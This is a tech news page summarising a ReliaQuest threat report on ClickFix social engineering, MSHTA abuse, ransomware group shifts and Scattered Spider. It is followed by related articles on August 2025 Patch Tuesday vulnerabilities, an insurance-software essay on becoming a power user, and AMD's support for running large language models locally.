ReliaQuest report exposes rise of social engineering cyber threats
ClickFix and social engineering tactics
One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease.
This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."
Lateral movement and initial access trends
Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities.
ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."
Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors.
MSHTA on the rise for defence evasion
MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake.
"ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.
Changes in ransomware operations
The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."
Impact on industry sectors
The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign.
Malware trends and threat actor activity
The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces.
"Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.
Emergence of Scattered Spider
Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."
Recommendations and defensive measures
ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts.
Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed.
The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Techday NZ
13 hours ago
- Techday NZ
August Patch Tuesday: Microsoft addressing 111 vulnerabilities
Microsoft is addressing 111 vulnerabilities this August 2025 Patch Tuesday, a volume which is around the recent average. In a neat parallel with last month, Microsoft is aware of public disclosure for a single one of the vulnerabilities published today, and claims no evidence of in-the-wild exploitation. Once again, the lone Patch Tuesday zero-day vulnerability is assessed as only moderate severity at time of publication, which brings Microsoft's lucky streak up to 11 months. Today's release includes the publication of nine critical remote code execution (RCE) vulnerabilities, although Microsoft has only marked one of these as more likely to see exploitation. Eight browser vulnerabilities have already been published separately this month, and are not included in the total. What do attackers want in a Windows context? Domain admin! When do they want it? Now! Today's lone zero-day vulnerability might be just what they need to break through the final layers of protection and swipe the crown jewels. CVE-2025-53779 is an elevation of privilege (EoP) vulnerability in the Windows implementation of Kerberos, which is enabled via abuse of dMSA configuration. The advisory FAQ provides more clues as to the nature of the attack than many comparable Microsoft advisories, but misses a golden opportunity for clarity, since it never sets out what it means by dMSA, leaving us scouring for contextual clues. Ultimately, we can determine from context that today's hot topic is the Delegated Managed Service Account, rather than the Defender Microservices Architecture or some other piece of Microsoft paraphernalia with matching initials. Microsoft's motivation is unimpeachable: the dMSA supports automated rotation of credentials for service accounts, and is specifically designed to prevent credential harvesting using Kerberoasting. Indeed, CISA has described Kerberoasting as one of the most time-efficient ways to elevate privileges and move laterally throughout an organisation's network. The good news here is that successful exploitation of CVE-2025-53779 requires an attacker to have pre-existing control of two attributes of the hopefully well protected dMSA: msds-groupMSAMembership, which determines which users may use credentials for the managed service account, and msds-ManagedAccountPrecededByLink, which contains a list of users on whose behalf the dMSA can act. However, abuse of CVE-2025-53779 is certainly plausible as the final link of a multi-exploit chain which stretches from no access to total pwnage. Finally, it's important to note that Microsoft is only publishing patches for Windows Server 2025, and that's because msds-ManagedAccountPrecededByLink was first implemented in Server 2025. Migrating to newer operating systems sooner rather than later remains good advice, but so is remediation of zero-day vulnerabilities which could give an attacker total control of your estate. The publication of any pre-authentication RCE in Windows will naturally spark discussion. Of course, not all pre-auth RCEs are created equal, and while CVE-2025-50165 has a hefty CVSSv3 base score of 9.8, and is certainly a cause for concern, it is not the worst of the worst, since it presumably isn't wormable. Despite that, a degree of alarm is amply justified, since the advisory FAQ mentions - twice! - that user interaction isn't required. Exploitation is via a malicious JPEG file, which could be delivered within an Office document or other means; perhaps even visiting a website would be sufficient, or receiving an email within Outlook, although the advisory doesn't explicitly confirm or deny these other possible attack routes. The malformed JPEG tricks the Windows Graphics Component into code execution via an untrusted pointer dereference. The context of execution isn't specified, so in the standard spirit of caution, we'll assume SYSTEM. This is hardly a new class of problem: we can cast our minds back a dozen years, for instance, and consider the broadly similar MS13-096. However, the specific flaw underlying CVE-2025-50165 is presumably a recent introduction, since only Windows 11 24H2 and Server 2025 receive patches. Patch this one sooner rather than later, since it could provide a skilled attacker with a valuable foothold from which to launch further attacks, including perhaps even today's CVE-2025-53779. The Windows GDI+ (Graphics Device Interface Plus) is at the centre of how almost all two-dimensional graphics are rendered on Windows assets. CVE-2025-53766 is a critical RCE in how GDI+ interprets metafiles, which are often used to store vector graphics. An attacker can achieve code execution via buffer overflow without privileges or user interaction. As with today's CVE-2025-50165, it's unlikely that this vulnerability could be wormable, but the most alarming path to exploitation involved simply uploading a malicious metafile to a Windows machine running unspecified web services. There is no mention of SharePoint, Exchange, Office, or other non-Windows products in the Security Updates section of the advisory, but that still leaves an essentially limitless potential attack surface; for example, anyone running a custom application offering file uploads could find themselves vulnerable to an attacker wielding a dodgy WMF file. On the bright side, the Preview Pane is not a vector in this case. A patch is available for Server 2008, but not Server 2012, a curious and possibly concerning pattern that we see from time to time with RCEs which affect the full historic range of Windows products. Today is certainly a good day for fans of critical RCE vulnerabilities which target weaknesses in how Windows interprets graphics. Exploitation of CVE-2025-50176, a flaw in the DirectX graphics kernel, could lead to execution in a kernel context. Microsoft considers exploitation more likely, which may be why the advisory doesn't provide a great deal of information about the means of exploitation, beyond a terse statement that type confusion is involved. Type confusion is where the kernel receives a pointer which it expects to be for one type of object, but is in fact for another, which is a bit like asking someone to read out loud from a restaurant menu, but then handing them their secret diary and hoping they won't notice the difference. Most people will not be fooled, but under the right circumstances, anything is possible. There are no significant changes to Microsoft product lifecycles this month. However, October will bring a flurry of changes, including the categorical end of support for non-LTSC versions of Windows 10.
Techday NZ
06-08-2025
- Techday NZ
Master of the trade tools: The case for becoming a power user
Just like builders are great with a hammer, and painters are great with a brush, we should be GREAT with the tools we use at work. Expert "power" users of tools are often more productive, perform better and have greater job satisfaction. Yet so many of us settle for being mediocre users of the systems we depend on every single day. If you want to be even more awesome than you already are, why not focus on mastering your trade tools? I'm talking about your laptop, mobile phone and software systems at your workplace. The difference between an average user and a power user isn't just marginal – it's transformational. The rise of new AI power tools just reinforces the strong benefits of becoming a power user. The path to power user status How do you develop your skills to become a super user and master these trade tools? The journey starts with mindset and motivation. Set a goal to be GREAT with the tools you need to use in your day-to-day work life. With a growth mindset, embrace experimentation and stay in that magic learning zone for part of your working week. Remember, every expert was once a beginner who refused to give up. Start with the fundamentals. Your laptop and mobile phone are your primary workhorses. Learn the operating system properly – whether it's Windows or MacOS for 99% of us. Master those handy keyboard shortcuts and mouse gestures that can shave seconds off every task. Those seconds add up to hours, which add up to days over the course of a year and even more over your career. Here's something that might sound basic but is absolutely crucial: get your typing speed match-fit. This single skill will pay dividends in time savings for the rest of your career. You'll be faster at getting stuff done, period. In our digital-first world, your typing speed is like your running speed in athletics – it's foundational to everything else you do. For each software product you rely on, whether it's Microsoft 365 or any other platform, a similar learning approach applies. Try things, learn the shortcuts, click on buttons and see what happens. Read the tool tips and help articles – they're there for a reason. Complete online learning courses when they're available. Don't be shy about asking your software vendor for suggestions – they want you to succeed with their product. YouTube videos can be incredibly helpful, though you'll need to sift through to find the quality content. And never underestimate the power of tapping your colleague on the shoulder and asking, "Hey, how do you do this?" Sometimes the person sitting next to you knows a trick that could save you hours every week. As your new superpowers develop, something interesting happens. You become the expert that workmates come to for help. You become more productive and efficient with your time. You know the fastest way to get things done. You know when to use a hammer and when to use a jackhammer, and you're an expert at both. The insurance broker's essential toolkit For those in the insurance broking world, what are the most important trade tools you need to master? In my experience, there are four critical systems that form the backbone of successful insurance broking: First, the Policy Management System (PMS) – what I like to call the "policy operating system." This is your primary system of record for the full lifecycle of policies and claims. It's where the magic happens, where relationships are managed, and where your business lives and breathes. Second, a Document Management System (DMS) for workflow management and maintaining read-only, audited records of documents and client interactions. In our compliance-heavy industry, this isn't just helpful – it's essential. Third, Microsoft 365 – email, documents, presentations, spreadsheets and online meetings. These are the communication and collaboration tools that keep your business moving and your clients informed. Fourth, your devices – laptop and mobile phone. These are your windows into all the other systems, and mastering them amplifies everything else you do. JAVLN offers both the PMS and DMS solutions. Together, they form a powerful, cloud-based broker operating system that does many things, and we're investing to make it even better. We've also built important integrations with Microsoft 365 because we understand that your tools shouldn't work in isolation. This isn't just another technology pitch – it's about reimagining how brokerages operate. Our research found that 70% of brokers spend over three hours a day on admin tasks. That's not productive, and it's not what your clients are paying for. They want your expertise and advice, not your data entry skills. What makes our product vision different is how these tools integrate into a cohesive whole, where data flows seamlessly between platforms, eliminating redundancy, duplication and creating a single source of truth. When your systems talk to each other properly, you can focus on what you do best: advising clients and building relationships. We want to help our end users develop their broker superpowers, using JAVLN's software in combination with your other trade tools to give you a genuine boost in performance and productivity. This is the journey we're on together. We practice what we preach at JAVLN At JAVLN, we're living proof of the power user philosophy. Being a software company with staff spread around the world, our main trade tools are all cloud-based and integrated: Google Workspace for email, documents, presentations, spreadsheets and online meetings; Google Gemini for AI capabilities; Slack for team communication; Atlassian tools including JIRA and Confluence for project management and knowledge sharing; and of course, our laptops as the gateway to everything else. Our trade tools are in the cloud, web-based, well integrated and secure with multi-factor authentication. We don't have servers in our office and we don't rely on VPNs or virtual desktop solutions. All these tools have handy companion apps on mobile phones too, meaning our team can be productive from anywhere. The result? By helping our teams adopt these tools as power users and use them to their full potential, we operate as a more productive business. We're more efficient with our time, we collaborate better as teams, and we can focus on delivering maximum value to our customers. We want our JAVLN customers to benefit from a similar setup, with trade tools purpose-built for brokers and all the jobs that need to be done in your daily workflow. The AI revolution: Your new power tools Where do AI tools fit into this picture? The recent rise of AI tools has been absolutely game-changing for those who have adopted them properly. The most popular for everyday use are Microsoft's Copilot, OpenAI's ChatGPT and Google's Gemini, but new tools are emerging constantly. Sticking with our analogy, AI represents a completely new category of power tool. If you already have a toolbox with standard power tools, AI tools are like adding a jackhammer or even a bulldozer to your arsenal. When used to its full potential, they provide enormous step changes in speed and quality, giving us genuinely superhuman capabilities when used properly. With great power comes great responsibility. That's why having a safe use policy in place is crucial – proper AI governance isn't optional in today's business environment. At JAVLN, we're driving forward with developing our employees to be "AI natives." We strongly encourage adoption of AI tools specific to each role and provide bite-sized training to build competency. We want our employees to master these AI trade tools using a similar approach to learning any software system: experiment and try things, learn the shortcuts, read the documentation, complete training courses, ask vendors for guidance, watch quality YouTube content, and collaborate with colleagues. The learning approach remains the same, but the potential impact is exponentially greater. The future belongs to the masters Over the coming next few years or less, it would be fantastic to see our JAVLN customers become "AI natives" as well, and masters of their trade tools. It's a superhuman boost that can make insurance brokers be better advisors. The professionals who master these tools will have a clear advantage – they'll analyse risks faster, generate proposals quicker, and provide clients with insights that used to take days to compile. This isn't futuristic thinking – these capabilities are available right now for those willing to learn. Your trade tools are waiting. The only question is: are you ready to master them?
Techday NZ
31-07-2025
- Techday NZ
AMD brings 128B LLMs to Windows PCs with Ryzen AI Max+ 395
AMD has announced a free software update enabling 128 billion parameter Large Language Models (LLMs) to be run locally on Windows PCs powered by AMD Ryzen AI Max+ 395 128GB processors, a capability previously only accessible through cloud infrastructure. With this update, AMD is allowing users to access and deploy advanced AI models locally, bypassing the need for third-party infrastructure, which can provide greater control, lower ongoing costs, and improved privacy. The company says this shift addresses growing demand for scalable and private AI processing at the client device level. Previously, models of this scale, such as those approaching the size of ChatGPT 3.0, were operable only within large-scale data centres. The new functionality comes through an upgrade to AMD Variable Graphics Memory, included with the upcoming Adrenalin Edition 25.8.1 WHQL drivers. This upgrade leverages the 96GB Variable Graphics Memory available on the Ryzen AI Max+ 395 128GB machine, supporting the execution of memory-intensive LLM workloads directly on Windows PCs. A broader deployment This update also marks the AMD Ryzen AI Max+ 395 (128GB) as the first Windows AI PC processor to run Meta's Llama 4 Scout 109B model - specifically with full vision and multi-call processing (MCP) support. The processor can manage all 109 billion parameters in memory, although the mixture-of-experts (MoE) architecture means only 17 billion parameters are active at any given time. The company reports output rates of up to 15 tokens per second for this model. According to AMD, the ability to handle such large models locally is important for users who require high-capacity AI assistants on-the-go. The system also supports flexible quantisation and can facilitate a range of LLMs, from compact 1B parameter models to Mistral Large, using the GGUF format. This isn't just about bringing cloud-scale compute to the desktop; it's about expanding the range of options for how AI can be used, built, and deployed locally. The company further states that performance in MoE models like Llama 4 Scout correlates with the number of active parameters, while dense models depend on the total parameter count. The memory capacity of the AMD Ryzen AI Max+ platform allows users to opt for higher-precision models, supporting up to 16-bit models through when trade-offs between quality and performance are warranted. Context and workflow AMD also highlights the importance of context size when working with LLMs. The AMD Ryzen AI Max+ 395 (128GB), equipped with the new driver, can run Meta's Llama 4 Scout at a context length of 256,000 (with Flash Attention ON and KV Cache Q8), significantly exceeding the standard 4,096 token window default in many applications. Examples provided include demonstrations where an LLM summarises extensive documents, such as an SEC EDGAR filing, requiring over 19,000 tokens to be held in context. Another example cited the summarisation of a research paper from the ARXIV database, needing more than 21,000 tokens from query initiation to final output. AMD notes that more complex workflows might require even greater context capacity, particularly for multi-tool and agentic scenarios. AMD states that while occasional users may manage with a context length of 32,000 tokens and a lightweight model, more demanding use cases will benefit from hardware and software that support expansive contexts, as offered by the AMD Ryzen AI Max+ 395 128GB. Looking ahead, AMD points to an expanding set of agentic workflows as LLMs and AI agents become more widely adopted for local inferencing. Industry trends indicate that model developers, including Meta, Google, and Mistral, are increasingly integrating tool-calling capabilities into their training runs to facilitate local personal assistant use cases. AMD also provides guidance on maintaining caution when enabling tool access for large language models, noting the potential for unpredictable system behaviour and outcomes. Users are advised to install LLM implementations only from trusted sources. The AMD Ryzen AI Max+ 395 (128GB) is now positioned to support most models available through and other tools, offering flexible deployment and model selection options for users with high-performance local AI requirements.
